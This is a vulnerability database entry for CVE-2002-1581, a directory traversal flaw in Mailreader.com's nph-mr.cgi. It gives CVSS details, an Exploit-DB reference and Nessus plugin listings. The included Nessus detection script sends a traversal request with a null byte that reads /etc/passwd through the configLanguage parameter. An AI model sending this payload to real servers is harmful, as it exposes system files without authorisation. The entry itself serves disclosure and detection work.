Vulnerabilities > CVE-2002-1581
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
NONE Availability impact
NONE Summary
Directory traversal vulnerability in nph-mr.cgi in Mailreader.com 2.3.20 through 2.3.31 allows remote attackers to view arbitrary files via .. (dot dot) sequences and a null byte (%00) in the configLanguage parameter.
Vulnerable Configurations
Exploit-Db
description | MailReader.com 2.3.x NPH-MR.CGI File Disclosure Vulnerability. CVE-2002-1581. Webapps exploit for cgi platform |
id | EDB-ID:21966 |
last seen | 2016-02-02 |
modified | 2002-10-28 |
published | 2002-10-28 |
reporter | pokleyzz |
source | https://www.exploit-db.com/download/21966/ |
title | MailReader.com 2.3.x NPH-MR.CGI File Disclosure Vulnerability |
Nessus
NASL family CGI abuses NASL id MAILREADER.NASL description Mailreader.com software is installed. A directory traversal flaw allows anybody to read arbitrary files on your system. last seen 2020-06-01 modified 2020-06-02 plugin id 11780 published 2003-06-26 reporter This script is Copyright (C) 2003-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/11780 title Mailreader 2.3.30 - 2.3.31 Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # # References: # Date: Mon, 28 Oct 2002 17:48:04 +0800 # From: "pokleyzz" <[email protected]> # To: "bugtraq" <[email protected]>, # "Shaharil Abdul Malek" <[email protected]>, # "sk" <[email protected]>, "pokley" <[email protected]>, # "Md Nazri Ahmad" <[email protected]> # Subject: SCAN Associates Advisory : Multiple vurnerabilities on mailreader.com # include("compat.inc"); if(description) { script_id(11780); script_version("1.22"); script_cve_id("CVE-2002-1581", "CVE-2002-1582"); script_bugtraq_id(5393, 6055, 6058); script_name(english:"Mailreader 2.3.30 - 2.3.31 Multiple Vulnerabilities"); script_set_attribute(attribute:"synopsis", value: "It is possible to access arbitrary file on the remote host." ); script_set_attribute(attribute:"description", value: "Mailreader.com software is installed. A directory traversal flaw allows anybody to read arbitrary files on your system." ); script_set_attribute(attribute:"solution", value: "Upgrade to v2.3.32 or later" ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "2003/06/26"); script_set_attribute(attribute:"vuln_publication_date", value: "2002/10/28"); script_cvs_date("Date: 2018/06/13 18:56:27"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_summary(english:"Checks directory traversal & version number of mailreader.com software"); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc."); script_family(english:"CGI abuses"); script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl", "webmirror.nasl"); script_require_ports("Services/www", 80); script_exclude_keys("Settings/disable_cgi_scanning"); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); port = get_http_port(default:80); foreach dir (make_list(cgi_dirs())) { w = http_send_recv3(method:"GET", port: port, item: strcat(dir, "/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00")); if (isnull(w)) exit(1, "The web server on port "+port+" did not answer"); r2 = strcat(w[0], w[1], '\r\n', w[2]); if ("Powered by Mailreader.com" >< r2 && r2 =~ "root:[^:]*:0:[01]:") { security_warning(port); exit(0); } }
NASL family Debian Local Security Checks NASL id DEBIAN_DSA-534.NASL description A directory traversal vulnerability was discovered in mailreader whereby remote attackers could view arbitrary files with the privileges of the nph-mr.cgi process (by default, www-data) via relative paths and a null byte in the configLanguage parameter. last seen 2020-06-01 modified 2020-06-02 plugin id 15371 published 2004-09-29 reporter This script is Copyright (C) 2004-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/15371 title Debian DSA-534-1 : mailreader - directory traversal